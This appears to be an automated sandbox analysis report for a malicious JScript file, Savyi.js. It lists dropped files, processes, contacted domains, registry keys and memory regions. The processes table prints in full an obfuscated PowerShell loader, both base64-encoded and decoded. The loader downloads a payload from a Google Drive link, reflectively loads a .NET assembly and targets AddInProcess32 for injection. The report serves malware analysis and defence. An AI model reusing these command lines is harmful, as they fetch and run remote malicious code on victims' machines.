Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Savyi.js
|
Unicode text, UTF-8 text, with very long lines (566), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b234y12o.qgp.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm42lszd.eg0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onnz5dbs.gdu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3mlfayi.l1n.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Savyi.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABFAE4AVgA6AEMATwBNAHMAUABlAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8AaQBOACcAJwApACAAKAAgACgAKAAnADgATwBaAGkAbQBhAGcAZQBVAHIAbAAgAD0AIABOADYASQBoAHQAdABwAHMAOgAvAC8AZAByAGkAdgBlAC4AZwBvAG8AZwBsAGUALgBjAG8AbQAvAHUAYwA/AGUAeABwAG8AcgB0AD0AZABvAHcAbgBsAG8AYQBkACYAaQBkAD0AJwArACcAMQBBACcAKwAnAEkAVgBnAEoASgBKAHYAMQBGACcAKwAnADYAdgBTADQAcwBVAE8AeQBiAG4ASAAtAHMARAB2AFUAaABCAFkAdwB1AHIAIABOADYASQA7ADgATwBaAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjACcAKwAnAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlACcAKwAnAGIAQwBsAGkAZQBuAHQAOwA4AE8AWgBpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgADgATwBaAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAA4AE8AWgBpAG0AYQBnACcAKwAnAGUAVQByAGwAKQA7ADgATwBaAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQAnACsAJwBuACcAKwAnAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdAAnACsAJwBTACcAKwAnAHQAcgBpACcAKwAnAG4AJwArACcAZwAoADgATwBaAGkAbQBhAGcAZQBCACcAKwAnAHkAdABlAHMAKQA7ADgATwBaAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAE4ANgBJADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4ATgA2AEkAOwAnACsAJwA4AE8AWgBlAG4AZABGAGwAJwArACcAYQBnACAAPQAgAE4ANgBJADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBOADYASQA7ADgATwAnACsAJwBaAHMAdABhACcAKwAnAHIAdABJAG4AZABlAHgAIAA9ACAAOABPAFoAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAOABPAFoAcwB0AGEAcgB0AEYAbABhAGcAKQA7ADgATwBaAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAnACsAJwA4AE8AWgBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAA4AE8AWgBlAG4AZABGAGwAYQBnACkAOwA4AE8AWgBzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgADgATwBaAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJwArACcAOAAnACsAJwBPAFoAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ADgATwBaAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AJwArACcAIAA4AE8AWgBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAOABPAFoAYgBhAHMAZQA2ADQATAAnACsAJwBlAG4AZwB0AGgAIAA9ACAAJwArACcAOABPAFoAZQBuAGQASQBuAGQAZQB4ACAALQAgADgATwBaAHMAdABhAHIAdABJAG4AZABlAHgAJwArACcAOwA4AE8AWgBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgADgATwBaAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0ACcAKwAnAHIAaQBuAGcAKAA4AE8AWgBzAHQAYQByAHQASQBuAGQAZQB4ACwAIAA4AE8AWgBiAGEAcwBlADYANABMAGUAbgBnAHQAJwArACcAaAApADsAOABPAFoAYgAnACsAJwBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAOABPAFoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAAwAE4AUAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAA4AE8AWgBfACAAfQApAFsALQAxAC4ALgAtACgAOABPAFoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuACcAKwAnAEwAZQBuAGcAdABoACkAXQA7ADgATwBaAGMAJwArACcAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAA4AE8AWgBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7ADgATwBaAGwAbwBhACcAKwAnAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdAAnACsAJwBpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAOABPAFoAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ADgATwBaAHYAYQBpAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABOADYASQBWAEEASQBOADYASQApADsAOABPAFoAdgBhAGkATQAnACsAJwBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAoADgATwBaAG4AdQBsAGwALAAgAEAAKABOADYASQAwAC8AZQB6AHEAVAA1AC8AZAAvAGUAZQAuACcAKwAnAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALAAgAE4ANgBJAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgBOADYASQAsACAATgA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAnACsAJwAsACAATgAnACsAJwA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAsAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkAJwArACcALABOADYASQBkAGUAcwBhAHQAaQB2AGEAZABvAE4ANgBJACwATgA2AEkAZABlAHMAYQB0AGkAdgBhAGQAbwBOADYASQAsAE4ANgBJAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkALABOADYASQBkAGUAcwBhAHQAaQB2AGEAZABvAE4ANgBJACwATgA2AEkAMQBOADYAJwArACcASQAsAE4ANgBJACcAKwAnAGQAZQBzAGEAdABpAHYAYQBkAG8ATgA2AEkAKQApADsAJwApACAALQByAGUAcABsAGEAYwBlACAAIAAnADgATwBaACcALABbAEMAaABhAHIAXQAzADYAIAAtAHIAZQBwAGwAYQBjAGUAIAAgACcAMABOAFAAJwAsAFsAQwBoAGEAcgBdADEAMgA0AC0AcgBlAHAAbABhAGMAZQAnAE4ANgBJACcALABbAEMAaABhAHIAXQAzADkAKQAgACkA';$OWjuxD
= [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden
-executionpolicy bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
"&( $ENV:COMsPec[4,15,25]-JoiN'') ( (('8OZimageUrl = N6Ihttps://drive.google.com/uc?export=download&id='+'1A'+'IVgJJJv1F'+'6vS4sUOybnH-sDvUhBYwur
N6I;8OZwebClient = New-Objec'+'t System.Net.We'+'bClient;8OZimageBytes = 8OZwebClient.DownloadData(8OZimag'+'eUrl);8OZimageText
= [System.Text.E'+'n'+'coding]::UTF8.Get'+'S'+'tri'+'n'+'g(8OZimageB'+'ytes);8OZstartFlag = N6I<<BASE64_START>>N6I;'+'8OZendFl'+'ag
= N6I<<BASE64_END>>N6I;8O'+'Zsta'+'rtIndex = 8OZimageText.IndexOf(8OZstartFlag);8OZendIndex = '+'8OZimageText.IndexOf(8OZendFlag);8OZstartIndex
-ge 0 -and 8OZendIndex -gt '+'8'+'OZstartIndex;8OZstartIndex +='+' 8OZstartFlag.Length;8OZbase64L'+'ength = '+'8OZendIndex
- 8OZstartIndex'+';8OZbase64Command = 8OZimageText.Subst'+'ring(8OZstartIndex, 8OZbase64Lengt'+'h);8OZb'+'ase64Reversed =
-join (8OZbase64Command.ToCharArray() 0NP ForEach-Object { 8OZ_ })[-1..-(8OZbase64Command.'+'Length)];8OZc'+'ommandBytes =
[System.Convert]::FromBase64String(8OZbase64Reversed);8OZloa'+'dedAssembly = [System.Reflect'+'ion.Assembly]::Load(8OZcommandBytes);8OZvaiMethod
= [dnlib.IO.Home].GetMethod(N6IVAIN6I);8OZvaiM'+'ethod.Invoke(8OZnull, @(N6I0/ezqT5/d/ee.'+'etsap//:sptthN6I, N6IdesativadoN6I,
N6IdesativadoN6I, N6IdesativadoN6I, N6IAddInProcess32N6I, N6IdesativadoN6I'+', N'+'6IdesativadoN6I,N6IdesativadoN6I'+',N6IdesativadoN6I,N6IdesativadoN6I,N6IdesativadoN6I,N6IdesativadoN6I,N6I1N6'+'I,N6I'+'desativadoN6I));')
-replace '8OZ',[Char]36 -replace '0NP',[Char]124-replace'N6I',[Char]39) )"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://drive.google.com
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 6 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
drive.google.com
|
142.250.186.174
|
||
|
drive.usercontent.google.com
|
142.250.185.161
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.186.174
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
229366C1000
|
heap
|
page read and write
|
||
|
229366C9000
|
heap
|
page read and write
|
||
|
22937ED0000
|
heap
|
page read and write
|
||
|
3745EF8000
|
stack
|
page read and write
|
||
|
FA9A1FF000
|
stack
|
page read and write
|
||
|
22936769000
|
heap
|
page read and write
|
||
|
22936151000
|
heap
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
FA9A2FE000
|
stack
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366DF000
|
heap
|
page read and write
|
||
|
22936708000
|
heap
|
page read and write
|
||
|
22936241000
|
heap
|
page read and write
|
||
|
2B50162E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
2293477F000
|
heap
|
page read and write
|
||
|
2293497D000
|
heap
|
page read and write
|
||
|
22936768000
|
heap
|
page read and write
|
||
|
210EEEC2000
|
heap
|
page read and write
|
||
|
210ECC5B000
|
heap
|
page read and write
|
||
|
2B5101B6000
|
trusted library allocation
|
page read and write
|
||
|
22936761000
|
heap
|
page read and write
|
||
|
22936233000
|
heap
|
page read and write
|
||
|
22936961000
|
heap
|
page read and write
|
||
|
229366F1000
|
heap
|
page read and write
|
||
|
E5B72BE000
|
stack
|
page read and write
|
||
|
229366BA000
|
heap
|
page read and write
|
||
|
229366C3000
|
heap
|
page read and write
|
||
|
3745CFC000
|
stack
|
page read and write
|
||
|
22936710000
|
heap
|
page read and write
|
||
|
229366E4000
|
heap
|
page read and write
|
||
|
229361CE000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366E7000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366D9000
|
heap
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
2293671C000
|
heap
|
page read and write
|
||
|
22936733000
|
heap
|
page read and write
|
||
|
3746079000
|
stack
|
page read and write
|
||
|
229366DC000
|
heap
|
page read and write
|
||
|
21080162000
|
trusted library allocation
|
page read and write
|
||
|
229361C4000
|
heap
|
page read and write
|
||
|
210EED67000
|
heap
|
page execute and read and write
|
||
|
229366A5000
|
heap
|
page read and write
|
||
|
E5B6E7E000
|
stack
|
page read and write
|
||
|
E5B7E0E000
|
stack
|
page read and write
|
||
|
22936220000
|
heap
|
page read and write
|
||
|
22936710000
|
heap
|
page read and write
|
||
|
2293615C000
|
heap
|
page read and write
|
||
|
229366F4000
|
heap
|
page read and write
|
||
|
22936160000
|
heap
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
2B57DAB7000
|
heap
|
page execute and read and write
|
||
|
7FF848CD3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
22936760000
|
heap
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
22934740000
|
heap
|
page read and write
|
||
|
2109002B000
|
trusted library allocation
|
page read and write
|
||
|
22936783000
|
heap
|
page read and write
|
||
|
22936708000
|
heap
|
page read and write
|
||
|
229366FD000
|
heap
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
2293673D000
|
heap
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
229366C8000
|
heap
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
229361A1000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
229366FD000
|
heap
|
page read and write
|
||
|
22934975000
|
heap
|
page read and write
|
||
|
2B57B9B0000
|
heap
|
page read and write
|
||
|
22936733000
|
heap
|
page read and write
|
||
|
229347AF000
|
heap
|
page read and write
|
||
|
22934768000
|
heap
|
page read and write
|
||
|
2B57BA80000
|
heap
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
22936173000
|
heap
|
page read and write
|
||
|
2293671C000
|
heap
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
229366F5000
|
heap
|
page read and write
|
||
|
2293616E000
|
heap
|
page read and write
|
||
|
22936705000
|
heap
|
page read and write
|
||
|
7FF848CFC000
|
trusted library allocation
|
page read and write
|
||
|
2293672D000
|
heap
|
page read and write
|
||
|
374598E000
|
stack
|
page read and write
|
||
|
229366BA000
|
heap
|
page read and write
|
||
|
22936248000
|
heap
|
page read and write
|
||
|
229347D1000
|
heap
|
page read and write
|
||
|
210ECC33000
|
heap
|
page read and write
|
||
|
2293618F000
|
heap
|
page read and write
|
||
|
2B57BAA3000
|
heap
|
page read and write
|
||
|
7FF848E91000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
229361A1000
|
heap
|
page read and write
|
||
|
229366C9000
|
heap
|
page read and write
|
||
|
229366C4000
|
heap
|
page read and write
|
||
|
2293482B000
|
heap
|
page read and write
|
||
|
229366A9000
|
heap
|
page read and write
|
||
|
210ECD40000
|
trusted library allocation
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366C7000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229361C0000
|
heap
|
page read and write
|
||
|
22936187000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
2293617B000
|
heap
|
page read and write
|
||
|
229347A4000
|
heap
|
page read and write
|
||
|
229366B2000
|
heap
|
page read and write
|
||
|
7FF848E82000
|
trusted library allocation
|
page read and write
|
||
|
22934833000
|
heap
|
page read and write
|
||
|
22936165000
|
heap
|
page read and write
|
||
|
229366B1000
|
heap
|
page read and write
|
||
|
3745F7E000
|
stack
|
page read and write
|
||
|
229361B1000
|
heap
|
page read and write
|
||
|
210ECB80000
|
heap
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366B5000
|
heap
|
page read and write
|
||
|
37459CE000
|
stack
|
page read and write
|
||
|
2B57BA60000
|
heap
|
page read and write
|
||
|
7FF848E8A000
|
trusted library allocation
|
page read and write
|
||
|
22936964000
|
heap
|
page read and write
|
||
|
22936710000
|
heap
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
22936177000
|
heap
|
page read and write
|
||
|
229366F3000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
|
229366F2000
|
heap
|
page read and write
|
||
|
22936772000
|
heap
|
page read and write
|
||
|
22936175000
|
heap
|
page read and write
|
||
|
22936782000
|
heap
|
page read and write
|
||
|
229366C2000
|
heap
|
page read and write
|
||
|
229366AC000
|
heap
|
page read and write
|
||
|
2B57DAB0000
|
heap
|
page execute and read and write
|
||
|
22936765000
|
heap
|
page read and write
|
||
|
2B57BA10000
|
heap
|
page read and write
|
||
|
22936157000
|
heap
|
page read and write
|
||
|
229361CA000
|
heap
|
page read and write
|
||
|
22936710000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
229366F5000
|
heap
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
229366F5000
|
heap
|
page read and write
|
||
|
229366D9000
|
heap
|
page read and write
|
||
|
229361C7000
|
heap
|
page read and write
|
||
|
229361CC000
|
heap
|
page read and write
|
||
|
229366F3000
|
heap
|
page read and write
|
||
|
229366DA000
|
heap
|
page read and write
|
||
|
2B57DAEF000
|
heap
|
page read and write
|
||
|
22936213000
|
heap
|
page read and write
|
||
|
22936707000
|
heap
|
page read and write
|
||
|
22936724000
|
heap
|
page read and write
|
||
|
229361B4000
|
heap
|
page read and write
|
||
|
2293623C000
|
heap
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
229366DD000
|
heap
|
page read and write
|
||
|
22936194000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
22936700000
|
heap
|
page read and write
|
||
|
2293671C000
|
heap
|
page read and write
|
||
|
7FF848CED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B50022E000
|
trusted library allocation
|
page read and write
|
||
|
210EECD4000
|
heap
|
page read and write
|
||
|
2293481D000
|
heap
|
page read and write
|
||
|
210EEC32000
|
heap
|
page read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
|
2293623E000
|
heap
|
page read and write
|
||
|
22936761000
|
heap
|
page read and write
|
||
|
22936224000
|
heap
|
page read and write
|
||
|
22936238000
|
heap
|
page read and write
|
||
|
22934813000
|
heap
|
page read and write
|
||
|
210ECC15000
|
heap
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293672D000
|
heap
|
page read and write
|
||
|
2B57DCD6000
|
heap
|
page read and write
|
||
|
7FF848F50000
|
trusted library allocation
|
page read and write
|
||
|
2B501714000
|
trusted library allocation
|
page read and write
|
||
|
21080512000
|
trusted library allocation
|
page read and write
|
||
|
2293615D000
|
heap
|
page read and write
|
||
|
2B57DD04000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
229361AE000
|
heap
|
page read and write
|
||
|
7FF848E81000
|
trusted library allocation
|
page read and write
|
||
|
2108006E000
|
trusted library allocation
|
page read and write
|
||
|
229366B2000
|
heap
|
page read and write
|
||
|
22936241000
|
heap
|
page read and write
|
||
|
2293670E000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
22936706000
|
heap
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
22936231000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
2B50172F000
|
trusted library allocation
|
page read and write
|
||
|
229361AB000
|
heap
|
page read and write
|
||
|
210EECA3000
|
heap
|
page read and write
|
||
|
210ECC13000
|
heap
|
page read and write
|
||
|
210ECA80000
|
heap
|
page read and write
|
||
|
229366D1000
|
heap
|
page read and write
|
||
|
229361D2000
|
heap
|
page read and write
|
||
|
E5B6CFE000
|
stack
|
page read and write
|
||
|
22934809000
|
heap
|
page read and write
|
||
|
2293672D000
|
heap
|
page read and write
|
||
|
2108065A000
|
trusted library allocation
|
page read and write
|
||
|
22936241000
|
heap
|
page read and write
|
||
|
229361C4000
|
heap
|
page read and write
|
||
|
22936733000
|
heap
|
page read and write
|
||
|
2293617D000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
2B57BAA5000
|
heap
|
page read and write
|
||
|
22936185000
|
heap
|
page read and write
|
||
|
2B57DDA5000
|
heap
|
page read and write
|
||
|
2B57D832000
|
heap
|
page read and write
|
||
|
2B57BAA7000
|
heap
|
page read and write
|
||
|
7FF848CDD000
|
trusted library allocation
|
page execute and read and write
|
||
|
229366C0000
|
heap
|
page read and write
|
||
|
374590F000
|
stack
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
22934610000
|
heap
|
page read and write
|
||
|
2293672E000
|
heap
|
page read and write
|
||
|
22936768000
|
heap
|
page read and write
|
||
|
22936197000
|
heap
|
page read and write
|
||
|
21080111000
|
trusted library allocation
|
page read and write
|
||
|
229366EE000
|
heap
|
page read and write
|
||
|
210EEEB3000
|
heap
|
page read and write
|
||
|
210EEECB000
|
heap
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
22936768000
|
heap
|
page read and write
|
||
|
22936237000
|
heap
|
page read and write
|
||
|
229366BB000
|
heap
|
page read and write
|
||
|
229366B2000
|
heap
|
page read and write
|
||
|
2B57B9A0000
|
heap
|
page read and write
|
||
|
2B500084000
|
trusted library allocation
|
page read and write
|
||
|
2293622E000
|
heap
|
page read and write
|
||
|
22936706000
|
heap
|
page read and write
|
||
|
2293618C000
|
heap
|
page read and write
|
||
|
22936688000
|
heap
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
21080503000
|
trusted library allocation
|
page read and write
|
||
|
22936706000
|
heap
|
page read and write
|
||
|
22936689000
|
heap
|
page read and write
|
||
|
2293619C000
|
heap
|
page read and write
|
||
|
2108009D000
|
trusted library allocation
|
page read and write
|
||
|
E5B7138000
|
stack
|
page read and write
|
||
|
2B57DD31000
|
heap
|
page read and write
|
||
|
E5B733E000
|
stack
|
page read and write
|
||
|
22936179000
|
heap
|
page read and write
|
||
|
229366A1000
|
heap
|
page read and write
|
||
|
229366F2000
|
heap
|
page read and write
|
||
|
210EEBE0000
|
heap
|
page read and write
|
||
|
22936747000
|
heap
|
page read and write
|
||
|
210EE630000
|
heap
|
page execute and read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
229366E2000
|
heap
|
page read and write
|
||
|
229366ED000
|
heap
|
page read and write
|
||
|
210ECDA0000
|
heap
|
page read and write
|
||
|
2293671C000
|
heap
|
page read and write
|
||
|
22936170000
|
heap
|
page read and write
|
||
|
2B50187C000
|
trusted library allocation
|
page read and write
|
||
|
2293667F000
|
heap
|
page read and write
|
||
|
7FF848D96000
|
trusted library allocation
|
page read and write
|
||
|
2B57BDD0000
|
trusted library allocation
|
page read and write
|
||
|
21080435000
|
trusted library allocation
|
page read and write
|
||
|
E5B73BE000
|
stack
|
page read and write
|
||
|
2293482E000
|
heap
|
page read and write
|
||
|
2293617D000
|
heap
|
page read and write
|
||
|
E5B69E3000
|
stack
|
page read and write
|
||
|
229366EF000
|
heap
|
page read and write
|
||
|
22934818000
|
heap
|
page read and write
|
||
|
22934819000
|
heap
|
page read and write
|
||
|
2B57D7F0000
|
trusted library allocation
|
page read and write
|
||
|
229361A3000
|
heap
|
page read and write
|
||
|
210ECBDB000
|
heap
|
page read and write
|
||
|
22936688000
|
heap
|
page read and write
|
||
|
22934970000
|
heap
|
page read and write
|
||
|
7FF848CE2000
|
trusted library allocation
|
page read and write
|
||
|
229366C9000
|
heap
|
page read and write
|
||
|
22936248000
|
heap
|
page read and write
|
||
|
2B5018E1000
|
trusted library allocation
|
page read and write
|
||
|
210ECDA5000
|
heap
|
page read and write
|
||
|
2293622B000
|
heap
|
page read and write
|
||
|
2293617A000
|
heap
|
page read and write
|
||
|
22936738000
|
heap
|
page read and write
|
||
|
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
|
22936709000
|
heap
|
page read and write
|
||
|
22936710000
|
heap
|
page read and write
|
||
|
229361CC000
|
heap
|
page read and write
|
||
|
229361C7000
|
heap
|
page read and write
|
||
|
22936157000
|
heap
|
page read and write
|
||
|
2293673D000
|
heap
|
page read and write
|
||
|
37460FF000
|
stack
|
page read and write
|
||
|
229361D1000
|
heap
|
page read and write
|
||
|
229366A8000
|
heap
|
page read and write
|
||
|
E5B6DFD000
|
stack
|
page read and write
|
||
|
37461FE000
|
stack
|
page read and write
|
||
|
229366AB000
|
heap
|
page read and write
|
||
|
7FF848EB2000
|
trusted library allocation
|
page read and write
|
||
|
229366E6000
|
heap
|
page read and write
|
||
|
2293619C000
|
